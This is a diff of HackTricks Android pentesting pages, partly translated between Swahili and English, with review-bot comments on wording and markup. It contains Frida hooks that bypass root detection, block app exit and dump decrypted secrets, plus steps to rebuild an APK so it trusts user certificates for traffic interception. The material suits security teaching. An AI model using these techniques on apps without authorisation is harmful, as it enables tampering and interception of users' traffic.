**You can find more Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)
## Mifano ya Haraka
## Quick Examples
### Kuita Frida kutoka kwenye mstari wa amri
### Calling Frida from command line
```bash
frida-ps -U
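Review bot: the link at L2886 is malformed: the space sits inside the bracket and the period inside the link text, `**Follow the[ link to read it.](frida-tutorial-2.md)**`, so the rendered link text begins with a space and "Follow the" loses its trailing space; write it as `**Follow the [link to read it](frida-tutorial-2.md).**` to match L2878 and L2893. L2883 also keeps the Swahili parenthetical "(Sehemu 2, 3 & 4)" inside an otherwise English line; since this file is moving to English, make it "(Parts 2, 3 & 4)".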
@ -82,57 +83,7 @@ frida -U --no-pause -l disableRoot.js -f owasp.mstg.uncrackable1
#frozen so that the instrumentation can occur, and the automatically
#continue execution with our modified code.
```
### Skripti ya Msingi ya Python
```python
import frida
# Create a session to connect to the target Android device
device = frida.get_usb_device()
pid = device.spawn(["com.example.app"])
session = device.attach(pid)
# Load the JavaScript code into the session
with open("script.js", "r") as file:
script_code = file.read()
script = session.create_script(script_code)
# Load the script into the target app's process
script.load()
# Run the script
script.exports.run()
# Detach from the target app's process and clean up
session.detach()
device.kill(pid)
```
### Skripti Rahisi ya Python
```python
import frida
# Unda kikao cha kuunganisha kifaa cha Android kilicholengwa
device = frida.get_usb_device()
pid = device.spawn(["com.example.app"])
session = device.attach(pid)
# Pakia kificho cha JavaScript kwenye kikao
with open("script.js", "r") as file:
script_code = file.read()
script = session.create_script(script_code)
# Pakia kificho kwenye mchakato wa programu ya lengo
script.load()
# Chalisha kificho
script.exports.run()
# Tenganisha kutoka kwenye mchakato wa programu ya lengo na safisha
session.detach()
device.kill(pid)
```
### Msingi wa Skripti ya Python
```python
import frida, sys
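Review bot: the heading at L2944, `### Msingi wa Skripti ya Python`, is left in Swahili while the other section headings in this file are being translated to English in this commit (L2897 "## Quick Examples", L2952 "### Hooking functions without parameters"); translate it to "### Basic Python Script" in the same pass. Dropping the sections at L2906-L2943 is correct: the two blocks at L2907-L2924 and L2926-L2943 are the same `frida.get_usb_device()` / `device.spawn()` / `script.exports.run()` script with English and Swahili comments respectively, and the script kept from L2945 onward already covers the case.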
@ -143,9 +94,9 @@ print('[ * ] Running Frida Demo application')
script.load()
sys.stdin.read()
```
### Kufunga kazi bila vigezo
### Hooking functions without parameters
Funga kazi `a()` ya darasa `sg.vantagepoint.a.c`
Hook the function `a()` of the class `sg.vantagepoint.a.c`
```javascript
Java.perform(function () {
; rootcheck1.a.overload().implementation = function() {
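Review bot: the context line L2957 opens with a stray `;` before `rootcheck1.a.overload()`; it is a legal empty statement, so nothing breaks, but it is pre-existing noise inside the `Java.perform` callback and worth removing while this snippet is being touched. The translated heading at L2952 and sentence at L2954 are fine.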
@ -155,101 +106,14 @@ return false;
};
});
```
# Kufunga java `exit()`
Katika programu za Android, `exit()` ni njia ya kumaliza programu. Kwa kufunga njia hii, tunaweza kuzuia programu isifunge kwa njia ya kawaida.
Frida inaruhusu kufunga njia hii kwa kuingilia kati kwenye kificho cha Java na kubadilisha matokeo ya wito wa `exit()`.
## Hatua za kufunga `exit()`
1. Anza kwa kuanzisha mazingira ya Frida kwenye kifaa chako cha Android.
2. Tumia kifaa chako cha Android kuanzisha mawasiliano na programu unayotaka kufunga `exit()`.
3. Tumia Frida kuchunguza kificho cha Java kinachohusiana na `exit()`.
4. Tumia Frida kubadilisha matokeo ya wito wa `exit()` ili kuzuia programu isifunge.
## Mifano ya Kubadilisha `exit()`
### Kubadilisha Matokeo ya `exit()` kuwa 0
```javascript
Java.perform(function() {
var System = Java.use('java.lang.System');
System.exit.implementation = function() {
console.log('exit() hooked');
return 0;
};
});
```
### Kubadilisha Matokeo ya `exit()` kuwa 1
```javascript
Java.perform(function() {
var System = Java.use('java.lang.System');
System.exit.implementation = function() {
console.log('exit() hooked');
return 1;
};
});
```
Kwa kufuata hatua hizi, unaweza kufunga `exit()` kwenye programu yako ya Android na kubadilisha matokeo ya wito wa `exit()` kulingana na mahitaji yako.
Hook java `exit()`
```javascript
var sysexit = Java.use("java.lang.System");
sysexit.exit.overload("int").implementation = function(var_0) {
send("java.lang.System.exit(I)V // We avoid exiting the application :)");
};
```
# Frida Tutorial: Kufunga `.onStart()` & `.onCreate()` ya MainActivity
Katika mafunzo haya, tutajifunza jinsi ya kufunga `.onStart()` na `.onCreate()` ya MainActivity katika programu ya Android kwa kutumia Frida.
## Hatua ya 1: Kuandaa Mazingira
Kabla ya kuanza, hakikisha kuwa umeweka mazingira yako ya maendeleo ya Android na Frida. Unaweza kufuata hatua zilizoelezwa katika [mafunzo haya](https://github.com/hacktricks/HackTricks-1/blob/master/mobilePentesting/androidAppPentesting/frida-tutorial/README.md) ili kuweka mazingira yako.
## Hatua ya 2: Kuandika Script ya Frida
Tutahitaji kuandika script ya Frida ili kufunga `.onStart()` na `.onCreate()` ya MainActivity. Hapa kuna script ya mfano:
```javascript
Java.perform(function() {
var MainActivity = Java.use('com.example.app.MainActivity');
MainActivity.onStart.implementation = function() {
console.log('onStart() imefungwa!');
this.onStart();
};
MainActivity.onCreate.implementation = function() {
console.log('onCreate() imefungwa!');
this.onCreate();
};
});
```
## Hatua ya 3: Kutekeleza Script ya Frida
Sasa tunahitaji kutekeleza script ya Frida kwenye programu ya Android. Hapa kuna hatua za kufuata:
1. Anza programu yako ya Android kwenye kifaa chako cha majaribio.
2. Fungua terminal na nenda kwenye saraka ambapo script ya Frida imehifadhiwa.
3. Chapa amri ifuatayo kutekeleza script ya Frida:
```bash
frida -U -f com.example.app -l script.js --no-pause
```
Kumbuka kubadilisha `com.example.app` na jina la pakiti la programu yako ya Android.
## Hatua ya 4: Kupima Matokeo
Baada ya kutekeleza script ya Frida, unapaswa kuona ujumbe "onStart() imefungwa!" na "onCreate() imefungwa!" kwenye terminal. Hii inathibitisha kuwa `.onStart()` na `.onCreate()` ya MainActivity zimefungwa.
## Hitimisho
Kwa kufuata hatua hizi, unaweza kufunga `.onStart()` na `.onCreate()` ya MainActivity katika programu yako ya Android kwa kutumia Frida. Hii inaweza kuwa na manufaa katika uchunguzi wa usalama na upimaji wa programu.
Hook MainActivity `.onStart()` & `.onCreate()`
```javascript
var mainactivity = Java.use("sg.vantagepoint.uncrackable1.MainActivity");
mainactivity.onStart.overload().implementation = function() {
@ -261,34 +125,7 @@ send("MainActivity.onCreate() HIT!!!");
var ret = this.onCreate.overload("android.os.Bundle").call(this,var_0);
};
```
# Kufunga `.onCreate()` ya Android
Katika maendeleo ya programu za Android, `.onCreate()` ni njia muhimu sana ambayo huitwa wakati shughuli (activity) ya Android inaundwa. Kwa kufunga `.onCreate()`, tunaweza kuingilia kati mchakato wa kuanzisha shughuli na kufanya mabadiliko fulani.
Frida ni kifaa cha kuvamia ambacho kinaweza kutumika kufunga `.onCreate()` ya Android. Hapa kuna hatua za kufuata:
1. Tumia Frida kuanzisha mchakato wa programu ya Android unayotaka kufunga `.onCreate()` yake.
2. Tumia Frida kusoma na kuchambua kificho cha programu ili kupata jina la darasa na jina la njia ya `.onCreate()`.
3. Tumia Frida kuunda skripti ya JavaScript ambayo itaingilia kati `.onCreate()` na kufanya mabadiliko unayotaka.
4. Tumia Frida kutekeleza skripti ya JavaScript kwenye mchakato wa programu ya Android.
Hapa kuna mfano wa skripti ya JavaScript ambayo inafunga `.onCreate()` ya shughuli ya Android:
```javascript
Java.perform(function() {
var Activity = Java.use('com.example.Activity'); // Badilisha 'com.example.Activity' na jina la darasa la shughuli yako ya Android
Activity.onCreate.implementation = function(savedInstanceState) {
// Mabadiliko unayotaka kufanya
// ...
// Kuita .onCreate() ya awali
this.onCreate(savedInstanceState);
};
});
```
Kwa kutekeleza skripti hii ya JavaScript na Frida, utaweza kufunga `.onCreate()` ya shughuli ya Android na kufanya mabadiliko unayotaka.
Hook android `.onCreate()`
```javascript
var activity = Java.use("android.app.Activity");
activity.onCreate.overload("android.os.Bundle").implementation = function(var_0) {
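Review bot: removing the generated filler at L2962-L2991, L2999-L3030 and L3039-L3058 is right; those sections restate the kept snippets against placeholder classes such as `com.example.app.MainActivity` and add nothing to the hooks that remain. One inconsistency survives the cut: the retained snippets at L2994, L3033 and L3061 call `Java.use` at top level, whereas the hook at L2956 sits inside `Java.perform`, which is where Frida documents the Java bridge as safe to use (the current thread is attached to the VM there). Either wrap these three in `Java.perform(function () { ... })` or add one sentence saying they are meant to be pasted into a script that already runs inside `Java.perform`.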
@ -296,9 +133,9 @@ send("Activity HIT!!!");
var ret = this.onCreate.overload("android.os.Bundle").call(this,var_0);
};
```
### Kufunga kazi na vigezo na kupata thamani
### Hooking functions with parameters and retrieving the value
Kufunga kazi ya kufichua. Chapisha kuingia, ita kazi halisi ya kufichua kuingia na hatimaye, chapisha data wazi:
Kuhooki kazi ya ufichuzi. Chapisha ingizo, itisha kazi ya asili kufichua ingizo na hatimaye, chapisha data safi:
```javascript
function getString(data){
var ret = "";
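Review bot: the new sentence at L3070 translates "decrypt function" as "kazi ya ufichuzi" (ufichuzi means disclosure) and "plaintext" as "data safi" (clean data), which misdescribes what the hook starting at L3072 does; the replaced wording at L3069 ("kufichua", "data wazi") was closer, and "kazi ya kusimbua" with "data wazi", or simply leaving "decrypt" untranslated, would be clearer. The verb is also rendered "Kuhooki" here and "Hooka" at L3081; pick one form for the file.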
@ -323,9 +160,9 @@ send("Decrypted flag: " + flag);
return ret; //[B
};
```
### Kufunga kazi na kuzipiga kwa kutumia kuingiza kwetu
### Hooking functions and calling them with our input
Funga kazi ambayo inapokea herufi na ipige kazi hiyo kwa kutumia herufi nyingine (kutoka [hapa](https://11x256.github.io/Frida-hooking-android-part-2/))
Hooka kazi inayopokea mfuatano wa herufi na uitumie na mfuatano mwingine wa herufi (kutoka [hapa](https://11x256.github.io/Frida-hooking-android-part-2/))
```javascript
var string_class = Java.use("java.lang.String"); // get a JS wrapper for java's String class
@ -339,7 +176,7 @@ return ret;
```
### Kupata kitu kilichoundwa tayari cha darasa
Ikiwa unataka kuchukua sifa fulani ya kitu kilichoundwa, unaweza kutumia hii.
Ikiwa unataka kutoa sifa fulani ya kitu kilichoundwa unaweza kutumia hii.
Katika mfano huu utaona jinsi ya kupata kitu cha darasa my\_activity na jinsi ya kuita kazi .secret() ambayo itachapisha sifa ya faragha ya kitu:
```javascript
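Review bot: the heading at L3086, `### Kupata kitu kilichoundwa tayari cha darasa`, and the explanatory line at L3089 stay in Swahili while the neighbouring headings (L3068, L3079) are translated to English in this commit, and the only change in this hunk (L3087 to L3088) swaps one Swahili wording for another; translate the heading to "### Getting an already created object of a class" and the sentence below it so the file does not end up half-translated.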
@ -351,29 +188,30 @@ console.log("Result of secret func: " + instance.secret());
onComplete:function(){}
});
```
## Mafunzo mengine ya Frida
## Other Frida tutorials
* [https://github.com/DERE-ad2001/Frida-Labs](https://github.com/DERE-ad2001/Frida-Labs)
* [Sehemu ya 1 ya mfululizo wa blogu kuhusu Matumizi ya Frida ya Juu: Maktaba za Kusimbua za IOS](https://8ksec.io/advanced-frida-usage-part-1-ios-encryption-libraries-8ksec-blogs/)
* [Part 1 of Advanced Frida Usage blog series: IOS Encryption Libraries](https://8ksec.io/advanced-frida-usage-part-1-ios-encryption-libraries-8ksec-blogs/)
<figure><img src="../../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**Mshauri wa tuzo ya mdudu**: **Jisajili** kwa **Intigriti**, jukwaa la tuzo za mdudu la malipo lililoanzishwa na wadukuzi, kwa wadukuzi! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata tuzo hadi **$100,000**!
**Bug bounty tip**: **jiandikishe** kwa **Intigriti**, jukwaa la **bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers**! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata zawadi hadi **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
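Review bot: L3102 mixes languages: "**Bug bounty tip**" is left in English while the rest of the sentence is Swahili, and the same sentence at the top of this file was translated as "**Nasaha ya bug bounty**" at L2843; use one rendering in both places. The "## Other Frida tutorials" heading at L3096 and the 8ksec link text at L3099 are fine.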

View file

@ -1,31 +1,33 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
**Tazama: [https://blog.oversecured.com/Android-Access-to-app-protected-components/](https://blog.oversecured.com/Android-Access-to-app-protected-components/)**
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
**Angalia: [https://blog.oversecured.com/Android-Access-to-app-protected-components/](https://blog.oversecured.com/Android-Access-to-app-protected-components/)**
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

View file

@ -1,18 +1,19 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Kikundi cha Usalama cha Kujitahidi Kufanikiwa**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -20,19 +21,19 @@ Njia nyingine za kusaidia HackTricks:
***
Baadhi ya programu hazipendi vyeti vilivyopakuliwa na mtumiaji, hivyo ili kuchunguza trafiki ya wavuti kwa baadhi ya programu tunapaswa kuchambua tena programu na kuongeza vitu kadhaa na kuirudisha.
Baadhi ya programu hazipendi vyeti vilivyopakuliwa na mtumiaji, hivyo ili kukagua trafiki ya wavuti kwa baadhi ya programu tunapaswa ku-decompile programu hiyo na kuongeza mambo machache na kuirekebisha tena.
# Kiotomatiki
# Automatic
Zana [**https://github.com/shroudedcode/apk-mitm**](https://github.com/shroudedcode/apk-mitm) itafanya **kiotomatiki** mabadiliko muhimu kwenye programu ili kuanza kukamata maombi na pia kulemaza certificate pinning (ikiwa ipo).
Zana [**https://github.com/shroudedcode/apk-mitm**](https://github.com/shroudedcode/apk-mitm) itafanya mabadiliko muhimu kwenye programu ili kuanza kukamata maombi na pia itazima certificate pinning (ikiwa ipo).
# Kwa Mkono
# Manual
Kwanza tunachambua programu: `apktool d *jina-la-faili*.apk`
Kwanza tunadecompile programu: `apktool d *file-name*.apk`
![](../../.gitbook/assets/img9.png)
Kisha tunakwenda kwenye faili ya **Manifest.xml** & tunasonga chini hadi lebo ya `<\application android>` na tutaweka mstari ufuatao ikiwa haupo tayari:
Kisha tunaenda kwenye faili la **Manifest.xml** na kuporomoka hadi kwenye tag ya `<\application android>` na tutaongeza mstari ufuatao ikiwa haupo tayari:
`android:networkSecurityConfig="@xml/network_security_config`
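Review bot: L3202 is missing the closing quote on the attribute value: `android:networkSecurityConfig="@xml/network_security_config` should be `android:networkSecurityConfig="@xml/network_security_config"`, otherwise a reader who pastes it into the manifest gets malformed XML and `apktool b` fails before the config is ever applied; it is a context line, but fix it while this page is being edited. Two smaller points in the same hunk: L3201 renders "scroll down" as "kuporomoka" (to collapse), where the replaced L3200 "tunasonga chini" was correct, and both lines write the tag as `<\application android>`; the manifest tag is `<application>`.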
@ -44,7 +45,7 @@ Baada ya kuongeza:
![](../../.gitbook/assets/img11.png)
Sasa nenda kwenye saraka ya **res/xml** & unda/boresha faili iitwayo network\_security\_config.xml na yaliyomo yafuatayo:
Sasa ingia kwenye folda ya **res/xml** na uunde/badilisha faili lililo na jina network\_security\_config.xml lenye maudhui yafuatayo:
```markup
<network-security-config>
<base-config>
@ -57,28 +58,28 @@ Sasa nenda kwenye saraka ya **res/xml** & unda/boresha faili iitwayo network\_se
</base-config>
</network-security-config>
```
Kisha hifadhi faili & rudi nyuma kutoka kwenye mafaili yote na jenga upya apk kwa kutumia amri ifuatayo: `apktool b *jina-la-folda/* -o *faili-la-matokeo.apk*`
Kisha, hifadhi faili na kutoka kwenye saraka zote na ujenge tena apk kwa amri ifuatayo: `apktool b *folder-name/* -o *output-file.apk*`
![](../../.gitbook/assets/img12.png)
Mwishowe, unahitaji tu **kusaini programu mpya**. [Soma sehemu hii ya ukurasa wa Smali - Kudecompile/\[Kubadilisha\]/Kukusanya ili kujifunza jinsi ya kuaisaini](smali-changes.md#sing-the-new-apk).
Hatimaye, unahitaji tu **kusaini programu mpya**. [Soma sehemu hii ya ukurasa Smali - Decompiling/\[Modifying\]/Compiling kujifunza jinsi ya kuisaini](smali-changes.md#sing-the-new-apk).
<details>
**Kikundi cha Usalama cha Try Hard**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Ikiwa unataka kuona **kampuni yako ikitangazwa katika HackTricks** au **download HackTricks katika PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**PEASS rasmi & HackTricks swag**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
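Review bot: the footer at L3219-L3237 keeps the old `<details>` layout with the htARTE summary (the only change is the summary wording at L3225), while the header of the same file at L3167-L3183 and the other files visible in this commit switch to the `{% hint style="success" %}` block with "Support HackTricks"; replace the footer with the same block for consistency. Independently, the `<details>` opened at L3219 has content (the Try Hard figure and embed at L3220-L3223) before its `<summary>` at L3225; `<summary>` must be the first child of `<details>` for the disclosure widget to render correctly, so move the figure and embed above `<details>`.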

View file

@ -1,63 +1,66 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
